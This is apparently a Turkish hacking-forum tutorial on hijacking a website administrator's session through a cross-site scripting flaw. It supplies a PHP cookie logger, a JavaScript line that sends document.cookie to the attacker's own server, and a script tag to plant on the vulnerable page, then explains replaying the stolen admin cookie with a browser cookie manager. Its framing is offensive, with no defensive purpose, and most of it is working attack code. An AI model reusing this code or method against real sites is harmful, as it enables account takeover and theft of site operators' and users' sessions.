View hidden content is available for registered users!
Öncelikle kendi sunucumuza istediğiniz bir isimle php dosyası oluşturun -ben hata.php dedim- sonraiçine şunları yapıştırın:
Code:
<?php
if(isset($_GET["qxcek"])){
$file = fopen('yem.html', 'a');
fwrite($file, $_GET["qxcek"]."\n");
fclose($file);
}
?>
i=new/**/Image();i.src=http://burasizinsunucunuz.tk/hata.php?qxcek="+escape(document.cookie)
Sonra XSS açıklı hedef sitemize geliyoruz ve xss açığı olan sayfayı buluyoruz. Hemen şu kodu oraya eklettiriyoruz.
Code:
<script type="text/javascript" src="http://burasizinsunucunuz.tk/hata.php"></script>
Şimdi bekleme sırası 1-2 gün bekleyin. Eğer admin bu xss açıklı sayfa girerse ve o sırada da oturumu açıksa direk cookieler sizin sunucunuzda yem.html dosyasında
Bundan sonra mozilla için cookie manager yükleyin. Hedef sitenizde sizin cookieyi bulup editleyip çektiğimiz adminin cookiesini yazın. Ve artık adminin oturumu sizde başladı